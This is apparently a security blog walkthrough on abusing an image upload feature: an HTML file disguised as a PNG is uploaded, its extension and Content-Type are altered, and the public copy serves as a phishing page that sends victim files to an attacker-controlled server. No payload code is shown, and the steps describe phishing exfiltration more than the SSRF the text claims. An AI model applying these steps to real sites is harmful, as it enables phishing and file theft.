File upload features are everywhere — profile pictures, reports, documents, logs. Most developers treat them as low-risk functionality once file type and size checks are in place.

But what if a simple file upload could silently force a backend server to make outbound requests? What if those requests never touch the user interface, logs, or application responses — yet still leak internal access?

This is where Out-of-Band (OOB) Server-Side Request Forgery (SSRF) comes into play.

In this blog, I'll walk through how seemingly harmless file upload functionality can be abused to trigger SSRF in a completely blind manner, how attackers detect it using OOB techniques, and why traditional SSRF defenses often fail to catch it.

Step1: Navigate to the below functionality "Header Logo". Application allows image files to be uploaded. We will save html file as png file and try to upload the same

Step2: Save the Below HTML file as png. In the below file, this payload can be used as a phishing attack into tricking the victim to upload any file and the same file will reach to attacker's-controlled server.

Step3: Application checks for the file extension but not the content inside that file. Upload this file by clicking on the "Publish" button.

Step4: Capture the traffic inside the proxy tool. Observe the Highlighted text below.

Step5: Change the extension and the Content-Type as shown below.

Step6: Below is the location to where file gets uploaded.

Step7: We found out that the File Upload location was Public. Download the above file in a incognito browser.

Step8: Open the above file in a browser.

Step9: Upload a sample PDF file as shown below.

Step10: File reaches to the attacker's-controlled server below.

Step11: Copy the above highlighted value and paste the same in a browser as shown below. We get the sample pdf which the victim uploaded via phishing.